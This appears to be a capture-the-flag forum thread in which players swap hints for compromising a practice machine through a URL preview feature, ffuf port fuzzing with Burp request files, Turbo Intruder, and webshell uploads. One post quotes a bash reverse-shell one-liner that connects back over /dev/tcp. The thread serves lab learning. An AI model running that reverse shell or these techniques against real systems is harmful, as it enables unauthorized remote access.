hello is there anyone who want to join me and try pwn this box ?
I guess you can compile a simple program locally to run a shellā¦ upload to the machineā¦ set the suid on the file using the vulnerability and then run it?
You can save any type of request from Burp to a file, replace part of it with FUZZ, then use
ffuf -request requestfile -request-proto http -w wordlist
To send it as-is except for the part being fuzzed. For this box, you need something like -fr unsplash or another term thatās only in bad responses and the wordlist needs to be the list of ports
Correct me if Iām wrong but
Ok Iāll do that 
You are indeed mistaken: ffuf is able to handle requests like that, you just need to generate a request template for it. To be fair though, I donāt know of a way to do it in just one command and without using an additional file.
1 Like
Thanks to everyone who gave me little helping nudges along the way! I have really been enjoying being part of this community 
1 Like
yes. standart payload works fine with some changes ā/bin/bash -i >& /dev/tcp/IP/9001 0>&1ā. you just need to mask spaces.
Ahh okay. I guess I missed specifying the ādoing it in a single commandā part. Thatās why I used a python script which did all the work for me.
I wasnāt able to get a lot of success with curl as the output saved by curl was a file with an unholy mixture of Some HTTP response headers and parts of a gzip file which failed to extract .
Also itās awesome that you can do it with ffuf. It would be great if you can share the steps
quickly found the Preview thing/or httping to the attackerās machine and uploading a script. but thatās it. nothing seems to be working from there. canāt run anything. only downloading files. ffuf, ferobuster, Burp, gobuster find nothing with any of the 50+ lists iāve tried. uploads directory not accessible. no temp directory. nothing. after five months of academy and labs, another box i give up on.
That was TOUGH! Not sure Iād call it an Easy box given the amount of hoops to jump though.
User took me a while to finally have the āaha!ā moment I needed thanks to @Geexirooz_1ās hint. Root was definitely easier but still super interesting
This command get only 1 hit, then take it and go with a browser/curl/burp/etcā¦
How much time do you need to do that? Probably less than write a python script
1 Like
Yeah this one kicked my ā ā ā . Finally rooted after a lot of nudges from here.
1 Like
Hints for root plzzzā¦tried all the methods. a little nudge would be greatā:raised_hands:
Initial foothold is very challenging. After that itās pretty straightforward.
PM me for help/nudges anytime.
hey guys, I am literally strugling here , here is what found until now:
- the preview functionality uploads a file to the server to a temp place but it can be accessed only once, when you upload it via the website UI the image src change to the one you uploaded.
- there is another domain but it is moved permanetly to the current domain we have, basicly usless.
what do I look for ??
What could you do with a URL preview function that downloads a file from a URL? Other hints here should help. DM me if you are stuck 
-You donāt need a rev shell
-Youāll get far with burp
-Persistence will be key
turbo intruder finally did it for me thanks. I would be curious how someone did it with ffuf as I tried that, failed, then wasted time on other stuff because I thought I had already properly enumerated
1 Like
I finally solved it, guys who already solved it clean the stuff behind you
Ok, Iām stuck. So far Iāve been able to upload a file, and it auto downloads it back. But the php file does not get executed, just printed out back to me. Iāve tried other webshells (jsp, perl, coldfusion) and same deal. Can I get a hint towards getting a foothold?
THanks!
also: iāve tried the upload file and enter cover URL related link via repeater on burpsuite and it auto deletes it even before I can repeat the auto-download file request
Uploading a reverse shell is a rabbit hole. Look at the OWASP top 10(2021) its in there; you can gain a foothold from that page without uploading a shell. And use turbo intruder.